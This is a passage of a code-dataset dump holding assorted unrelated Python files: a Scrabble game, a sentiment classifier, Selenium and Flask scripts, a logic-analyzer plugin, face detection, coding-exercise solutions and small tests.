alphabet.index(letter)\r\n value = points[letterindex]\r\n #print(value)\r\n if i in x2letter:\r\n value *= 2\r\n elif i in x3letter:\r\n value *= 3\r\n #print(value)\r\n score += value\r\n #print(score)\r\n #print(scores)\r\n scores[turn] += score\r\n #print(scores)\r\n text = \"Player \"+str(turn+1)+\"\\n\\nScore: \"+str(scores[turn])\r\n playerinfo[turn].text=str(text)\r\n \r\n \r\n \r\n \r\n\r\ndef NextTurn():\r\n global turn,TilesUsed,SquaresUsed,movecount\r\n #print(TilesUsed)\r\n #print(SquaresUsed)\r\n \r\n AddScore()\r\n \r\n TilesUsed.sort(reverse=True)\r\n for each in TilesUsed:\r\n hands[turn].pop(each)\r\n TilesUsed = []\r\n SquaresUsed = []\r\n \r\n if movecount != 0:\r\n turn+=1\r\n if turn == no_of_players:\r\n turn -= no_of_players\r\n movecount+=1\r\n SwitchHand()\r\n for square in squares:\r\n if square.bg==\"goldenrod1\":\r\n square.bg=\"light goldenrod\"\r\n \r\n\r\ndef SwitchHand():\r\n global keeptiles\r\n for i in playerinfo:\r\n i.enabled=False\r\n i.bg=\"white\"\r\n i.text_color=\"black\" \r\n playerinfo[turn].enabled=True\r\n playerinfo[turn].bg=\"black\"\r\n playerinfo[turn].text_color=\"white\" \r\n keeptiles = len(hands[turn])\r\n for i in range(7):\r\n if i > keeptiles-1:\r\n hand[i].bg=\"SystemButtonFace\"\r\n hand[i].text=\"\"\r\n hand[i].enabled=False\r\n else:\r\n hand[i].text=hands[turn][i]\r\n hand[i].bg=\"light goldenrod\"\r\n hand[i].enabled=True\r\n hand[i].text_color=\"black\"\r\n if keeptiles < 7:\r\n 
DrawButton.enabled=True\r\n NextButton.enabled=False\r\n\r\n \r\ndef SelectTile(i):\r\n global tileindex, HandFull\r\n if len(hands[turn])==7: \r\n for j in hand:\r\n if j.enabled==True:\r\n j.bg=\"light goldenrod\"\r\n j.text_color=\"black\"\r\n hand[i].bg=\"black\"\r\n hand[i].text_color=\"white\"\r\n tileindex = i\r\n\r\ndef ShowHand():\r\n global hand\r\n hand = list()\r\n for i in range(7):\r\n hand.append(PushButton(app,grid=[i,11],text=\"\",width=3,\r\n command=lambda i=i: SelectTile(i))) \r\n hand[-1].text_size=30\r\n hand[-1].tk.configure(borderwidth=5) \r\n if i > 3:\r\n hand[-1].grid = [i-4,12,2,1]\r\n\r\ndef AddBag():\r\n global alltiles,hands,points\r\n alphabet.append(\"\")\r\n points = [1, 3, 3, 2, 1, 4, 2, 4, 1, 8, 5, 1, 3, 1, 1, 3, 10, 1,\r\n 1, 1, 1, 4, 4, 8, 4, 10, 0]\r\n letterfreq = [9, 2, 2, 4, 12, 2, 3, 2, 9, 1, 1, 4, 2, 6, 8, 2, 1,\r\n 6, 4, 6, 4, 2, 2, 1, 2, 1, 2]\r\n alltiles = []\r\n for number in range(27):\r\n for freq in range(letterfreq[number]):\r\n alltiles.append(alphabet[number])\r\n random.shuffle(alltiles)\r\n hands = list()\r\n for x in range(no_of_players):\r\n hands.append([])\r\n\r\n\r\ndef TakeTile():\r\n Visible = 0\r\n for i in range(7):\r\n if hand[i].enabled==True:\r\n Visible += 1\r\n hand[Visible].bg=\"light goldenrod\"\r\n hand[Visible].enabled=True\r\n if Visible == 6:\r\n DrawButton.enabled=False\r\n NextButton.enabled=True\r\n hand[Visible].text=alltiles[-1]\r\n hands[turn].append(alltiles[-1])\r\n alltiles.pop()\r\n DrawButton.text=\"Click to take a tile from the bag!\\nTiles remaining: \"+str(len(alltiles))\r\n \r\n\r\napp.display()\r\n","sub_path":"zcrabble.py","file_name":"zcrabble.py","file_ext":"py","file_size_in_byte":11006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"610939350","text":"import numpy as np\r\nfrom create_dictionary import create_dictionary\r\nfrom preprocessSentences import tokenize_corpus \r\nfrom preprocessSentences import find_wordcounts\r\nimport sys\r\nimport math\r\nimport random\r\nimport matplotlib.pyplot as plt\r\nfrom plot_roc import plot_roc\r\n\r\nSMOOTHING = 1.0\r\nBOW = \"out_bag_of_words_5.csv\"\r\nDICTIONARY = \"fs_vocab.txt\"\r\nCLASSES = \"out_classes_5.txt\"\r\nTRAINING = \"./train.txt\"\r\nTESTS = \"./test.txt\"\r\nEXPERIMENT_STEP = 20\r\n\r\n\r\n\"\"\" takes in the size of the vocabulary and reads in the sentences to create\r\n the bigram distributions and the p that any given sentence is positive\"\"\"\r\ndef get_distributions(docs, classes, len_vocab, n):\r\n dist_pos = []\r\n word_counts_pos = []\r\n dist_neg = []\r\n word_counts_neg = len_vocab * SMOOTHING\r\n\r\n for i in range(len_vocab + 2):\r\n a = []\r\n b = []\r\n for j in range(len_vocab + 2):\r\n a.append(SMOOTHING)\r\n b.append(SMOOTHING)\r\n dist_neg.append(a)\r\n dist_pos.append(b)\r\n\r\n pos_count = 0\r\n r = list(range(len(docs)))\r\n random.shuffle(r)\r\n for i in range(n):\r\n doc = docs[r[i]]\r\n last_word = len_vocab + 1\r\n for word in doc:\r\n if int(classes[r[i]]) == 
0:\r\n dist_neg[last_word][word] += 1\r\n else:\r\n dist_pos[last_word][word] += 1\r\n last_word = word\r\n if int(classes[r[i]]) != 0:\r\n pos_count += 1\r\n\r\n dist_neg_logs = [[math.log(e / float(sum(d))) for e in d] for d in dist_neg]\r\n dist_pos_logs = [[math.log(e / float(sum(d))) for e in d] for d in dist_pos]\r\n # print pos_count, n\r\n p_pos = float(pos_count) / float(n)\r\n return (dist_neg_logs, dist_pos_logs, p_pos)\r\n\r\ndef get_data(path, vocab, word_to_id):\r\n docs, classes, _, _ = tokenize_corpus(path, train=True)\r\n docsid = []\r\n for doc in docs:\r\n ids = []\r\n for word in doc:\r\n if word in word_to_id.keys():\r\n ids.append(word_to_id[word])\r\n else:\r\n ids.append(len(vocab))\r\n docsid.append(ids)\r\n return (docsid, classes)\r\n\r\ndef find_p(observed, dist):\r\n p = 0.0\r\n last_word = len(dist) - 1\r\n for word in observed:\r\n p += dist[last_word][word]\r\n last_word = word\r\n return p\r\n\r\ndef predict(test_case, dist_pos, dist_neg, p_pos):\r\n p_given_neg = find_p(test_case, dist_neg)\r\n p_given_pos = find_p(test_case, dist_pos)\r\n # print p_given_neg, p_given_pos\r\n return -math.log(1.0-p_pos) - p_given_neg - math.log(p_pos) + p_given_pos\r\n\r\ndef main():\r\n # create word dictionaries\r\n word_to_id, vocab = create_dictionary(DICTIONARY)\r\n\r\n # training data\r\n train_docs, train_classes = get_data(TRAINING, vocab, word_to_id)\r\n\r\n # find test data\r\n test_docs, test_classes = get_data(TESTS, vocab, word_to_id)\r\n\r\n # train\r\n dist_neg, dist_pos, p_pos = get_distributions(train_docs, train_classes, len(vocab), 2400)\r\n\r\n #print dist_pos[55]\r\n # test\r\n scores = []\r\n for i in range(len(test_classes)):\r\n test_case = test_docs[i]\r\n scores.append(predict(test_case, dist_pos, dist_neg, p_pos))\r\n\r\n # print \"%d out of %d tests correct predicted %d neg\" % (correct, len(test_classes), zeroes)\r\n\r\n plot_roc(scores, [int(cl) for cl in test_classes], \"bigram\")\r\n np.savetxt(\"n_gram_scores.txt\", scores)\r\nmain()","sub_path":"sentiment/scripts/predict_n_gram.py","file_name":"predict_n_gram.py","file_ext":"py","file_size_in_byte":3380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"136889957","text":"#!/usr/bin/env python3\nfrom argparse import ArgumentParser\nfrom pathlib import Path\nimport pandas as pd\n\n\naparser = ArgumentParser(\n description='Combine probabilistic forecast'\n)\n\naparser.add_argument('--mean', type=Path, required=True)\naparser.add_argument('--std', type=Path, required=True)\naparser.add_argument('--out', type=Path, required=True)\nargs = aparser.parse_args()\n\nmean = pd.read_csv(args.mean, index_col='time', parse_dates=['time'])\nstd = pd.read_csv(args.std, index_col='time', parse_dates=['time'])\n\ncombined = pd.concat((mean, std), axis=1)\ncombined.to_csv(args.out)\n","sub_path":"BP2Q1/combine_prob_forecast.py","file_name":"combine_prob_forecast.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"651677538","text":"import time\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\n# driver = webdriver.Firefox()\n\ndriver = webdriver.Chrome(executable_path=r\"C:\\Users\\pathapaa\\Videos\\git_practice\\selenium_practice\\chromedriver_win\\chromedriver.exe\")\n\ndriver.get(\"http://demo.automationtesting.in/Windows.html\") # to navigate to given URL\n\nprint(driver.title) # displays the title of the 
page\n\nprint(driver.current_url) # returns url of the current page\n\n# to perform action/click or some thing , once u find the button we need to click on the same\n# so we are using click method\ndriver.find_element_by_xpath('//*[@id=\"Tabbed\"]/a/button').click()\ntime.sleep(5)\n\n# close the browser and it will open only one window at a time . Let say we are clicking on one button\n# where it is opening new tab , if u use close it will close the parent tab only not the child tab which\n# opened by your click\n# driver.close() # currently focused tab\n\ndriver.quit() # to close the all the tabs\n","sub_path":"selenium_practice/webdriver_commands.py","file_name":"webdriver_commands.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"148008183","text":"# This HLA combines a stream of bytes into multi-byte messages.\n# To detect the end of a message and the start of the next one, you can choose between timeouts or\n# delimiter bytes (or both).\n# Output can be displayed as HEX or ASCII.\n# Supported input protocols are I2C, SPI and Serial UART.\n\n# This HLA was forked from Mark Garrison's example HLA \"Text Messages\"\n\n# Settings constants.\nfrom saleae.analyzers import HighLevelAnalyzer, AnalyzerFrame, StringSetting, NumberSetting, ChoicesSetting\nfrom saleae.data import GraphTimeDelta\n\nMESSAGE_PREFIX_SETTING = 'Message Prefix (optional)'\nPACKET_TIMEOUT_SETTING = 'Packet Timeout [µs]'\nPACKET_DELIMITER_SETTING = 'Packet Delimiter'\nDISPLAY_FORMAT_SETTING = 'Display Format'\n\nDELIMITER_CHOICES = {\n 'None': '',\n 'New Line [\\\\n]': '\\n',\n 'Null [\\\\0]': '\\0',\n 'Space [\\' \\']': ' ',\n 'Semicolon [;]': ';',\n 'Tab [\\\\t]': '\\t'\n}\n\nDISPLAY_FORMAT_CHOICES = {\n 'ASCII': 'ascii',\n 'HEX': 'hex'\n}\n\nclass Concatenator(HighLevelAnalyzer):\n\n temp_frame = None\n delimiter = '\\n'\n\n # Settings:\n prefix = StringSetting(label='Message Prefix (optional)')\n packet_timeout = NumberSetting(label='Packet Timeout [µs]', min_value=1, max_value=1E10) # , default_value=30)\n delimiter_setting = ChoicesSetting(label='Packet Delimiter', choices=DELIMITER_CHOICES.keys())\n display_format_setting = ChoicesSetting(label='Display Format', choices=DISPLAY_FORMAT_CHOICES.keys())\n\n # Base output formatting options:\n result_types = {\n 'error': {\n 'format': 'Error!'\n },\n }\n\n def __init__(self):\n self.delimiter = DELIMITER_CHOICES.get(self.delimiter_setting, '\\n')\n self.display_format = DISPLAY_FORMAT_CHOICES.get(self.display_format_setting, 'hex')\n self.result_types[\"message\"] = {\n 'format': self.prefix + ('{{{data.hex}}}' if self.display_format == 'hex' else '{{{data.str}}}')\n }\n\n def clear_stored_message(self, frame):\n self.temp_frame = AnalyzerFrame('message', frame.start_time, frame.end_time, {\n 'str': '',\n 'hex': ''\n })\n\n def append_str(self, str):\n self.temp_frame.data[\"str\"] += str\n\n def append_hex(self, str):\n self.temp_frame.data[\"hex\"] += str\n\n def have_existing_message(self):\n if self.temp_frame is None:\n return False\n if len(self.temp_frame.data[\"str\"]) == 0:\n return False\n return True\n\n def update_end_time(self, frame):\n self.temp_frame.end_time = frame.end_time\n\n def decode(self, frame: AnalyzerFrame):\n # This class method is called once for each frame produced by the input analyzer.\n # the \"data\" dictionary contents is specific to the input analyzer type. 
The readme with this repo contains a description of the \"data\" contents for each input analyzer type.\n # all frames contain some common keys: start_time, end_time, and type.\n\n # This function can either return nothing, a single new frame, or an array of new frames.\n # all new frames produced are dictionaries and need to have the required keys: start_time, end_time, and type\n # in addition, protocol-specific information should be stored in the \"data\" key, so that they can be accessed by rendering (using the format strings), by export, by the terminal view, and by the protocol search results list.\n # Not all of these are implemented yet, but we're working on it!\n\n # All protocols - use the delimiter specified in the settings.\n delimiters = [] if self.delimiter == '' else [self.delimiter]\n\n # All protocols - delimit on a delay specified in the settings\n # consider frames further apart than this separate messages\n maximum_delay = GraphTimeDelta(second=self.packet_timeout * 0.000001 or 0.5E-3)\n # I2C - delimit on address byte\n # SPI - delimit on Enable toggle. TODO: add support for the SPI analyzer to send Enable/disable frames, or at least a Packet ID to the low level analyzer.\n\n char = \"unknown error\"\n hexVal = \"unknown error\"\n\n # setup initial result, if not present\n first_frame = False\n if self.temp_frame is None:\n first_frame = True\n self.clear_stored_message(frame)\n\n # handle serial data and I2C data\n if frame.type == \"data\" and \"data\" in frame.data.keys():\n value = frame.data[\"data\"][0]\n char = chr(value)\n hexVal = format(value, '02X')\n\n # handle I2C address\n if frame.type == \"address\":\n value = frame.data[\"address\"][0]\n # if we have an existing message, send it\n if self.have_existing_message() == True:\n ret = self.temp_frame\n self.clear_stored_message(frame)\n self.append_str(\"address: \" + hex(value) + \";\")\n self.append_hex(\"address: \" + hex(value) + \";\")\n return ret\n # append the address to the beginning of the new message\n self.append_str(\"address: \" + hex(value) + \";\")\n self.append_hex(\"address: \" + hex(value) + \";\")\n return None\n\n # handle I2C start condition\n if frame.type == \"start\":\n return\n\n # handle I2C stop condition\n if frame.type == \"stop\":\n if self.have_existing_message() == True:\n ret = self.temp_frame\n self.temp_frame = None\n return ret\n self.temp_frame = None\n return\n\n # handle SPI byte\n if frame.type == \"result\":\n char = \"\"\n hexVal = \"\"\n if \"miso\" in frame.data.keys() and frame.data[\"miso\"] != 0:\n char += chr(frame.data[\"miso\"])\n hexVal += format(frame.data[\"miso\"], '02X')\n if \"mosi\" in frame.data.keys() and frame.data[\"mosi\"] != 0:\n char += chr(frame.data[\"mosi\"])\n hexVal += format(frame.data[\"mosi\"], '02X')\n\n # If we have a timeout event, commit the frame and make sure not to add the new frame after the delay, and add the current character to the next frame.\n if first_frame == False and self.temp_frame is not None:\n if self.temp_frame.end_time + maximum_delay < frame.start_time:\n ret = self.temp_frame\n self.clear_stored_message(frame)\n self.append_str(char)\n self.append_hex(hexVal + \" \")\n return ret\n\n self.append_str(char)\n self.append_hex(hexVal + \" \")\n self.update_end_time(frame)\n\n # if the current character is a delimiter, commit it.\n if (delimiters != []) and (char in delimiters):\n ret = self.temp_frame\n # leave the temp_frame blank, so the next frame is the beginning of the next message.\n self.temp_frame = None\n return 
ret\n","sub_path":"concatenator.py","file_name":"concatenator.py","file_ext":"py","file_size_in_byte":6919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"481194101","text":"from selenium.webdriver.common.by import By\nfrom time import sleep\n\nlink =' http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/'\n\n\ndef test_add_busket_button(browser):\n browser.get(link)\n #sleep(30)\n add_basket=browser.find_element_by_css_selector(\".btn-add-to-basket\")\n assert add_basket, 'No add button on page'","sub_path":"unit3. Тестовые фреймворки/6. PyTest — параметризация, конфигурирование, плагины/Рецензии/2/Language_store-master/test_items.py","file_name":"test_items.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"357593963","text":"import unittest\nimport json\n\nfrom AccessToken import AccessToken\n\nclass TokenTest(unittest.TestCase):\n def setUp(self):\n strstr = \"\"\"\n{\"access_token\": \"WEwwW_suwzkw0g4DihE7xgbpX7m3M3BFRTbllvLaiXuiUBMRa_C_caBnpYob8ddVb1RIFkt-vGO7leWeEcwkJmlP5cJkanWydG-qTHn4DqsYaQs1RSYgo0hhBndm17jDIWRhADAVJE\", \"update_time\": 1455966724.439898, \"expires_in\": 7200}\n\"\"\"\n self.zdict = json.loads(strstr)\n\n def test_token_expire(self):\n self.test_save()\n tk = AccessToken()\n tk2 = tk.load(\"test_save\")\n self.assertEqual(7200, tk2.expires_in)\n\n\n def test_token_init(self):\n tk = AccessToken()\n self.assertTrue(isinstance(tk, AccessToken))\n\n def test_setData(self):\n tk = AccessToken()\n tk.set_data(self.zdict)\n self.assertTrue(tk.access_token)\n pass\n\n def test_save(self):\n tk = AccessToken()\n tk.set_data(self.zdict)\n tk.save(\"test_save\")\n\n def test_load(self):\n self.test_save()\n tk = AccessToken()\n tk2 = tk.load(\"test_save\")\n self.assertEqual(tk.access_token, tk2.access_token)\n self.assertEqual(tk.expires_in, tk2.expires_in)\n self.assertEqual(tk.update_time, tk2.update_time)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"AccessTokenTest.py","file_name":"AccessTokenTest.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"321394131","text":"#! 
/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n\ndef to_camel_case(line: str) -> str:\n result = str()\n next_upper = False\n for el in line:\n\n if next_upper:\n el = el.upper()\n next_upper = False\n if el == '_':\n el = ''\n next_upper = True\n result += el\n return result\n\n\ndef to_snake_case(line: str) -> str:\n result = str()\n for el in line:\n if el.isupper():\n el = '_' + el.lower()\n result += el\n return result\n\n\nprint(to_camel_case('print([res_square ** 2 for res_square in input_array if res_square > 18 ])'))\n","sub_path":"lab_7/main_7.py","file_name":"main_7.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"179954822","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom scipy import misc\nimport sys\nimport os\nimport argparse\nimport tensorflow as tf\nimport numpy as np\nimport facenet\nimport align.detect_face\nimport random\nimport cv2\nfrom time import sleep\n\ndef initial_mtcnn():\n global pnet\n global rnet\n global onet\n\n with tf.Graph().as_default():\n gpu_options = tf.compat.v1.GPUOptions(per_process_gpu_memory_fraction=1.0)\n sess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options, log_device_placement=False))\n with sess.as_default():\n pnet, rnet, onet = align.detect_face.create_mtcnn(sess, None)\n \n \n \"\"\"\n if nrof_faces>0:\n det = bounding_boxes[:,0:4]\n det_arr = []\n img_size = np.asarray(img.shape)[0:2]\n if nrof_faces>1:\n for i in range(nrof_faces):\n det_arr.append(np.squeeze(det[i])) \n else:\n det_arr.append(np.squeeze(det))\n\n for i, det in enumerate(det_arr):\n det = np.squeeze(det)\n bb = np.zeros(4, dtype=np.int32)\n bb[0] = np.maximum(det[0]-args.margin/2, 0)\n bb[1] = np.maximum(det[1]-args.margin/2, 0)\n bb[2] = np.minimum(det[2]+args.margin/2, img_size[1])\n bb[3] = np.minimum(det[3]+args.margin/2, img_size[0])\n cropped = img[bb[1]:bb[3],bb[0]:bb[2],:]\n scaled = misc.imresize(cropped, (182, 182), interp='bilinear')\n \"\"\"\ndef detect_faces_from_Image(img):\n\n minsize = 20 # minimum size of face\n threshold = [ 0.6, 0.7, 0.7 ] # three steps' threshold\n factor = 0.709 # scale factor\n\n img = img[:,:,0:3] \n bounding_boxes, _ = align.detect_face.detect_face(img, minsize, pnet, rnet, onet, threshold, factor)\n det = bounding_boxes\n \n return det\n \n\n\nif __name__ == '__main__':\n initial_mtcnn()\n\n # img = misc.imread(\"./Latest_Photo17.jpg\")\n\n # cap = cv2.VideoCapture(\"rtsp://wowzaec2demo.streamlock.net/vod/mp4:BigBuckBunny_115k.mov\")\n\n cap = cv2.VideoCapture(\"Face.mp4\")\n while(True):\n # Capture frame-by-frame\n ret, frame = cap.read()\n det = detect_faces_from_Image(frame)\n norf_faces=det.shape[0]\n det =np.squeeze(det[:,0:4])\n # Display the resulting frame\n if norf_faces==1:\n try:\n cv2.rectangle(frame,(int(np.round(det[0])),int(np.round(det[1]))),(int(np.round(det[2])),int(np.round(det[3]))),(0,255,0),2)\n except:\n print()\n elif norf_faces>1:\n for i in range(norf_faces):\n cv2.rectangle(frame,(int(np.round(det[i][0])),int(np.round(det[i][1]))),(int(np.round(det[i][2])),int(np.round(det[i][3]))),(0,255,0),2)\n\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n cv2.imshow('frame',frame)\n cap.release()\n cv2.destroyAllWindows()\n","sub_path":"src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} 
+{"seq_id":"640502825","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n\n# Complete the jumpingOnClouds function below.\ndef jumpingOnClouds(c):\n path = [0]\n last_visited = 0\n\n for i in range(len(c)):\n if c[i]==1:\n if not i==0 and i != len(c)-1:\n path.append(i-1)\n last_visited = i-1\n continue\n else:\n if i - last_visited <=1 :\n continue\n else:\n last_visited = i\n path.append(i)\n\n\n print(path) \n return len(path)-1\n\nif __name__ == '__main__':\n #fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n n = int(input().rstrip())\n c = list(map(int, input().rstrip().split()))\n result = jumpingOnClouds(c)\n print(result)\n\n # fptr.write(str(result) + '\\n')\n\n # fptr.close()\n","sub_path":"pythonCodes/miscell_solutions/hackerrank/jumpOnClouds.py","file_name":"jumpOnClouds.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"229718347","text":"#!/usr/bin/python3\n'''\nPython script that uses the API\nto export data in the CSV format.\n'''\nimport csv\nimport requests\nimport sys\n\n\nif __name__ == \"__main__\":\n emp_id = sys.argv[1]\n emp_name = requests.get(\"http://jsonplaceholder.typicode.com/users/{}\"\n .format(emp_id)).json().get(\"username\")\n done = []\n x = requests.get(\"http://jsonplaceholder.typicode.com/todos\").json()\n for todos in x:\n if (todos.get(\"userId\") == int(emp_id)):\n tmp = []\n tmp.extend((emp_id,\n emp_name,\n todos.get(\"completed\"),\n todos.get(\"title\")))\n done.append(tmp)\n\n with open(\"{}.csv\".format(emp_id), 'w+') as csvfile:\n writer = csv.writer(csvfile, delimiter=',',\n quotechar='\"', quoting=csv.QUOTE_ALL)\n writer.writerows(done)\n","sub_path":"0x15-api/1-export_to_CSV.py","file_name":"1-export_to_CSV.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"368497863","text":"\"\"\"Tests for super().\"\"\"\n\nfrom pytype.tests import test_base\n\n\nclass SuperTest(test_base.TargetPython27FeatureTest):\n \"\"\"Tests for super().\"\"\"\n\n def testSuperMissingArg(self):\n # Python 2 super call does not implicitly infer the class and self\n # arguments. At least the class argument should be specified.\n _, errors = self.InferWithErrors(\"\"\"\\\n class Foo(object):\n def __new__(cls):\n return super(cls).__new__(cls)\n class Bar(object):\n def __new__(cls):\n return super().__new__(cls)\n \"\"\")\n self.assertErrorLogIs(errors, [\n (3, \"wrong-arg-types\", r\"Type\\[super\\].*Type\\[Foo\\]\"),\n (6, \"wrong-arg-count\", r\"2.*0\")])\n\n\ntest_base.main(globals(), __name__ == \"__main__\")\n","sub_path":"pytype/tests/py2/test_super.py","file_name":"test_super.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"442219907","text":"# 1632. 
Rank Transform of a Matrix\n# vwc 212\n\n\n# 2021/06/03\n# Runtime: 4572 ms, faster than 14.29% of Python3 online submissions for Rank Transform of a Matrix.\n# Memory Usage: 88.5 MB, less than 17.35% of Python3 online submissions for Rank Transform of a Matrix.\n\n# Union-Find + topological sort. O(n * m * (lg n + lg m))\n# This solution is rough; there is plenty of room for optimization, and the discussion section has better approaches. Worth trying next time.\n# Optimization 1: the union-find nodes can simply be (i, j); storing the value in them as well adds nothing.\n# Use union-find to connect equal elements in the same row/column.\n# Then sort every row and every column of the matrix to get a directed graph over all the nodes.\n# Finally, run a BFS topological sort on this directed graph.\n\nimport collections\nfrom typing import List\n\n\nclass Solution:\n def matrixRankTransform(self, matrix: List[List[int]]) -> List[List[int]]:\n DG = {}\n n, m = len(matrix), len(matrix[0])\n nodes = [(matrix[i][j], i, j) for i in range(n) for j in range(m)]\n uf = UnionFind(nodes)\n\n for i in range(n):\n row = sorted([(matrix[i][j], i, j) for j in range(m)])\n for l in range(m - 1):\n if row[l][0] == row[l + 1][0]:\n uf.union(row[l], row[l + 1])\n\n for j in range(m):\n col = sorted([(matrix[i][j], i, j) for i in range(n)])\n for l in range(n - 1):\n if col[l][0] == col[l + 1][0]:\n uf.union(col[l], col[l + 1])\n\n for i in range(n):\n row = sorted([(matrix[i][j], i, j) for j in range(m)])\n for l in range(m - 1):\n if row[l][0] == row[l + 1][0]:\n continue\n par, kid = uf.find(row[l]), uf.find(row[l + 1])\n if par not in DG:\n DG[par] = set([kid])\n else:\n DG[par].add(kid)\n for j in range(m):\n col = sorted([(matrix[i][j], i, j) for i in range(n)])\n for l in range(n - 1):\n if col[l][0] == col[l + 1][0]:\n continue\n par, kid = uf.find(col[l]), uf.find(col[l + 1])\n if par not in DG:\n DG[par] = set([kid])\n else:\n DG[par].add(kid)\n\n in_degrees = self.in_degrees(DG)\n start = [x for x in DG if not in_degrees[x]]\n ranks = {}\n q = collections.deque(start)\n level = 1\n while q:\n size = len(q)\n for _ in range(size):\n node = q.popleft()\n if node not in ranks:\n ranks[node] = level\n if node not in DG: continue\n for nei in DG[node]:\n in_degrees[nei] -= 1\n if not in_degrees[nei]:\n q.append(nei)\n level += 1\n ans = [[1] * m for _ in range(n)]\n for i in range(n):\n for j in range(m):\n node = uf.find((matrix[i][j], i, j))\n if node in ranks:\n ans[i][j] = ranks[node]\n return ans\n\n def in_degrees(self, graph):\n deg = {}\n for x in graph:\n if x not in deg:\n deg[x] = 0\n for y in graph[x]:\n deg[y] = deg.get(y, 0) + 1\n return deg\n\n\nclass UnionFind:\n def __init__(self, nodes):\n self.parents = {node: node for node in nodes}\n\n def find(self, node):\n root = node\n while root != self.parents[root]:\n root = self.parents[root]\n while root != node:\n old_root = self.parents[node]\n self.parents[node] = root\n node = old_root\n return root\n\n def union(self, x, y):\n root_x = self.find(x)\n root_y = self.find(y)\n if root_x == root_y:\n return False\n self.parents[root_x] = root_y\n","sub_path":"1632. Rank Transform of a Matrix.py","file_name":"1632. 
Rank Transform of a Matrix.py","file_ext":"py","file_size_in_byte":3883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"489694771","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jul 1 21:08:18 2017\n\n@author: ujair\n\"\"\"\n\n\nfrom flask import Flask, render_template, request, redirect, url_for\nimport pandas as pd\nfrom operator import methodcaller\nimport numpy as np\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport mpld3\nfrom mpld3 import plugins\n\n\nsns.set_style('ticks')\n\napp = Flask(__name__)\n\n\ndef group_ngraph(dataframe):\n dataframe_col = dataframe.shape[1]\n RANGE = range(1, int(dataframe_col/4)+1)\n dv = ['Voltage_1 ({})'.format(i) for i in RANGE]\n dc = ['Current_1 ({})'.format(i) for i in RANGE]\n gv = ['Voltage_2 ({})'.format(i) for i in RANGE]\n gc = ['Current_2 ({})'.format(i) for i in RANGE]\n drain_v = text2float(dataframe[dv])\n drain_c = text2float(dataframe[dc])\n gate_v = text2float(dataframe[gv])\n gate_c = text2float(dataframe[gc])\n\n return drain_v, drain_c, gate_v, gate_c\n\n\ndef group_linear_saturation(dataframe):\n dv, dc, gv, gc = group_ngraph(dataframe)\n return pd.concat([dv, dc, gv, gc], axis=1)\n\n\ndef toNestedList(data):\n data = data.splitlines()\n splitedData = list(map(methodcaller(\"split\", \"\\t\"), data))\n\n return splitedData\n\n\ndef text2float(df):\n shape = df.shape\n c = df.columns\n v = df.values.astype('float64')\n df2 = pd.DataFrame(v.reshape(shape),\n columns=c)\n return df2\n\n\ndef linear_mu(L, a, W, Ci, v):\n return L*a/(W*Ci*v)\n\n\ndef linear_threshold(L, b, W, m, Ci, v):\n return -L*b/(W*m*Ci*v)\n\n\ndef saturation_mu(a, L, W, Ci):\n return 2*a*L/(W*Ci)\n\n\ndef saturation_threshold(b, L, W, m, Ci):\n return -b*L/(W*m*Ci)\n\n####################\n# Render HOME page\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n return render_template('index.html',\n title='PolyPhys Data Analysis')\n\n\n# end HOME page\n####################\n\n\n####################\n# for-ngraph page\n\n\n@app.route('/for-ngraph', methods=['GET', 'POST'])\ndef for_ngraph():\n return render_template('for-ngraph/for-ngraph.html',\n title='For Ngraph')\n\n\n@app.route('/for-ngraph/transformed', methods=['GET', 'POST'])\ndef for_ngraph_transform():\n title = \"Data is transformed!\"\n try:\n data = request.form['textarea'] # データを取得\n NestedList = toNestedList(data)\n try:\n df = pd.DataFrame(NestedList[1:], columns=NestedList[0])\n except:\n NestedList.pop(0)\n df = pd.DataFrame(NestedList[1:], columns=NestedList[0])\n drainVoltage, drainCurrent, gateVoltage, gateCurrent = group_ngraph(df)\n VOL1, CURR1 = drainVoltage.columns, drainCurrent.columns\n VOL2, CURR2 = gateVoltage.columns, gateCurrent.columns\n\n new_columns = []\n for v1, c1, v2, c2 in zip(VOL1, CURR1, VOL2, CURR2):\n new_columns.append(c1)\n new_columns.append(v1)\n new_columns.append(c2)\n new_columns.append(v2)\n df2 = 